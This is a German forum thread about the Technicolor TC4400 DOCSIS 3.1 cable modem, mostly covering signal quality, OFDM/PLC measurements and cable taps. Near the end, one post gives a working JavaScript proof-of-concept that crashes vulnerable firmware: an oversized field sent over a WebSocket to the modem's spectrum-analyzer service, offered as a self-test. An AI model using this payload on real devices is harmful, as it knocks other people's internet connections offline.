• Kunden aus Hessen und Nordrhein-Westfalen können über die Rufnummer 0221 / 466 191 00 Hilfe bei allen Problemen in Anspruch nehmen.
    Kunden aus Baden-Württemberg können über die Rufnummer 0711 / 54 888 150 Hilfe bei allen Problemen in Anspruch nehmen.

Technicolor TC4400 Docsis 3.1 Modem Info Tread

Diskutiere Technicolor TC4400 Docsis 3.1 Modem Info Tread im Internet und Telefon über das TV-Kabelnetz Forum im Bereich Internet und Telefon bei Unitymedia; Wenn der OFDM durchweg über 30dB hat, muss das TC4400 auch sowas anzeigen. Miss mal den PLC (786 oder 823) mit einem Messgerät. Ansonsten...

rv112

Beiträge
4.514
Reaktionen
228
Wenn der OFDM durchweg über 30dB hat, muss das TC4400 auch sowas anzeigen. Miss mal den PLC (786 oder 823) mit einem Messgerät.

Ansonsten: starkes Stück! Kenne ich in ähnlicher Form auch nur zu gut.
 

MichaelBre

Beiträge
954
Reaktionen
35
Wenn der OFDM durchweg über 30dB hat, muss das TC4400 auch sowas anzeigen.
Hab jetzt 1.3.6.1.4.1.46366.4292.77.1.307.0 wieder auf Integer 1 gesetzt, neugestartet und einen Reset durchgeführt.
Das TC4400 sieht den OFDM weiterhin nur mit 13,2dB SNR.

Das Messgerät meines Kollegen hat eindeutig über 30dB SNR angezeigt...
 

Anhänge

rv112

Beiträge
4.514
Reaktionen
228
Dein Kollege muss den PLC messen. Geht mit jedem D3.1 Messgerät. Wenn es da einstrahlt, ist der OFDM unbrauchbar.
 

MichaelBre

Beiträge
954
Reaktionen
35
Wie gesagt, hat er gemacht und immer über 30dB bei MER PLCT gehabt.
Das TC4400 kommt da aber nichtmal annähernd hin.
Ich schau mal was aus dem Ticket geworden ist.
 

MichaelBre

Beiträge
954
Reaktionen
35
Ich verstehe noch nicht warum das TC4400 den OFDM danals mit 4,8dB SNR auf Bonded ist und jetzt bei 10 bis 20dB SNR auf Partial Service steht...

04.07.2019:
TC4400 04.07.2019.png

Heute:
Bildschirmfoto 2020-01-09 um 15.30.55.png

Die Startfrequenz ist heute deutlich höher.
 

rv112

Beiträge
4.514
Reaktionen
228
Das ist nicht die Startfrequenz, sondern der PLC. Der OFDM startet nach wie vor bei 770MHz. Eventuell ist auch der SLC gestört nun. Am besten mal den gesamten OFDM messen und schauen wo der MER einbricht. Ein anderes Coaxkabel hast Du auch mal getestet?
 

MichaelBre

Beiträge
954
Reaktionen
35
Wir wollen die Tage nochmal messen und verschiedene Szenarien probieren.
Ist aber davon abhängig wie viel bei mir und Ihm zu tun ist.
 

MichaelBre

Beiträge
954
Reaktionen
35
Gab es eigentlich mal eine Info warum das TC4400 beim OFDM immer Profile ID 0,1,2 anzeigt?
Bei meinen Werten dürfte der nie mehr als Profile A verwenden.
 

UHeinz13

Beiträge
154
Reaktionen
7
@ MichaelBre

Sind bei Dir im Verteilerkasten eigentlich auch Abzweiger/Verteiler von Technetix verbaut? Ich weiß dass diese zwar von Unitymedia vorgeschrieben sind, aber testweise könntet ihr falls vorhanden, mal andere Abzweiger zum Test verwenden. Z.B. welche von Wisi, DCT-Delta etc. Ist echt keine Verschwörungstheorie aber die Technetix Teile dämpfen extrem viel mehr wie eigentlich üblich (im unteren und oberen Frequenzbereich) und haben auch einen krummen Frequenzverlauf dadurch.

Z.B. hat ein Technetix 6dB Abzweiger eine Dämpfung von 8dB vom Eingang zum TAP-Out bei 858 MHz obwohl en Wisi, oder DCT Delta Abzweiger mit 6dB nur eine Dämpfung von ca. 5dB im Vergleich dazu hat. Das sind immerhin 3dB mehr Dämpfung, also schlechter wo der Technetix Abzweiger damit abschneidet. Und glaub mir das macht ne Menge aus....

Schade dass Unitymedia nur auf diese Technetix Teile schwört.

Frag mal deinen Kollegen ob ihr sowas nur mal testweise machen wollt. Würde mich interessieren.
 
Zuletzt bearbeitet:

rv112

Beiträge
4.514
Reaktionen
228
Danke für die Info! Wie man liest, muss der Angriff also vom eigenen PC erfolgen und zusätzlich über den Sepctrum Analyzer, der ja seit .40 nicht mehr funktioniert (sobald gesynct). Vielleicht schon eine Reaktion von Technicolor? Würde mir jedoch auch mit der .33 wenig bis keine Sorgen machen. Ansonsten kann ja auf die .41 geupdatet werden, die läuft bei mir problemlos seit Wochen. Ich werde versuchen in Richtung Technicolor etwas zu erfahren, ob es hier ein Update geben wird.

Als ersten Schritt werde ich dennoch https sowie Port 8080 aufs Modem von der Firewall blocken. Man könnte auch noch weiter gehen und mittels IDS Java Code blocken.
 

sch4kal

Beiträge
1.000
Reaktionen
44
Im Rahmen des Public Disclosures wurde vermutlich Technicolor schon lange vorher bescheid gegeben, evtl. wurde deshalb der Spectrum Analyzer komplett deaktiviert ?
 

rv112

Beiträge
4.514
Reaktionen
228
Sage ich ja. Demnach brauche ich da nichts versuchen. Mit der .33 wird es vermutlich gehen. Aber das ist nicht mehr aktiv.
 

sch4kal

Beiträge
1.000
Reaktionen
44
Jup, verified in .33 Lab, TC4400 crasht. Interessant 😬
 

sparkie

Beiträge
787
Reaktionen
51
vielleicht geht der Firmwareflash ja doch bald auch ohne CMTS :D

zudem:
wenn jemand Unbefugtes in der Lage waere so einen Exploit zu nutzen, dann haette ich da erst mal ein ganz anderes Problem zu loesen, als mich um eine gefixte Modem Firmware zu kuemmern...
 

sch4kal

Beiträge
1.000
Reaktionen
44
Ein .40 oder .41 hast Du nicht da? Oder ein TM3402B?
Ne, kannst aber mit dem Javascript PoC ganz leicht selbst testen.
Code:
exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' +',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}'
console.log(exploit)
var socket = new WebSocket("ws://192.168.100.1:8080/Frontend", 'rpc-frontend') //Or some other ip and port!!!
socket.onopen = function(e) { socket.send(exploit)
};
Im Chrome oder Safari in die Console eingeben (Entwicklertools -> Console)
Wenn das Modem danach nicht mehr reagiert bzw. neustartet ist es verwundbar.
 
Thema:

Technicolor TC4400 Docsis 3.1 Modem Info Tread

Technicolor TC4400 Docsis 3.1 Modem Info Tread - Ähnliche Themen

  • Probleme mit TC4400

    Probleme mit TC4400: Hallo Leute, ich habe den Beitrag grad schon mal geschrieben, dieser konnte jedoch scheinbar nicht gepostet werden. Wenn dieser nun also doppelt...
  • Einrichtungsprobleme TC4400, ASUS RT-AX58U

    Einrichtungsprobleme TC4400, ASUS RT-AX58U: Guten Tag, ich habe das Internet gestern von der Vodafone Station auf mein neue TC4400-EU (Firmware SR70.12.42 ) umgestellt. Config File...
  • 2x TC4400 und TC CGA4233 abzugeben

    2x TC4400 und TC CGA4233 abzugeben: Da ich sowieso schon lange zur Telekom wechseln wollte und mein Vetrag im Dezember bei VF endlich ausgelaufen ist, habe ich nun zwei TC4400 und...
  • SPA112 hinter TC4400 mit USG (UDM)

    SPA112 hinter TC4400 mit USG (UDM): Hallo zusammen, hinter einem TC4400 Modem steht eine UDM (Router, AP) sowie daran ein Cisco SPA112. Leider bekomme ich es nicht gebacken . . ...
  • Ubiquity EdgeRouter X zu langsam für Cabel Max 1000?

    Ubiquity EdgeRouter X zu langsam für Cabel Max 1000?: Hallo, hat noch zufällig jemand einen Ubiquity ERX mit Cabel Max 1000? Die Downloadgeschwindigkeit am Router liegt bei mir zwischen 200-350...
  • Ähnliche Themen
  • Probleme mit TC4400

    Probleme mit TC4400: Hallo Leute, ich habe den Beitrag grad schon mal geschrieben, dieser konnte jedoch scheinbar nicht gepostet werden. Wenn dieser nun also doppelt...
  • Einrichtungsprobleme TC4400, ASUS RT-AX58U

    Einrichtungsprobleme TC4400, ASUS RT-AX58U: Guten Tag, ich habe das Internet gestern von der Vodafone Station auf mein neue TC4400-EU (Firmware SR70.12.42 ) umgestellt. Config File...
  • 2x TC4400 und TC CGA4233 abzugeben

    2x TC4400 und TC CGA4233 abzugeben: Da ich sowieso schon lange zur Telekom wechseln wollte und mein Vetrag im Dezember bei VF endlich ausgelaufen ist, habe ich nun zwei TC4400 und...
  • SPA112 hinter TC4400 mit USG (UDM)

    SPA112 hinter TC4400 mit USG (UDM): Hallo zusammen, hinter einem TC4400 Modem steht eine UDM (Router, AP) sowie daran ein Cisco SPA112. Leider bekomme ich es nicht gebacken . . ...
  • Ubiquity EdgeRouter X zu langsam für Cabel Max 1000?

    Ubiquity EdgeRouter X zu langsam für Cabel Max 1000?: Hallo, hat noch zufällig jemand einen Ubiquity ERX mit Cabel Max 1000? Die Downloadgeschwindigkeit am Router liegt bei mir zwischen 200-350...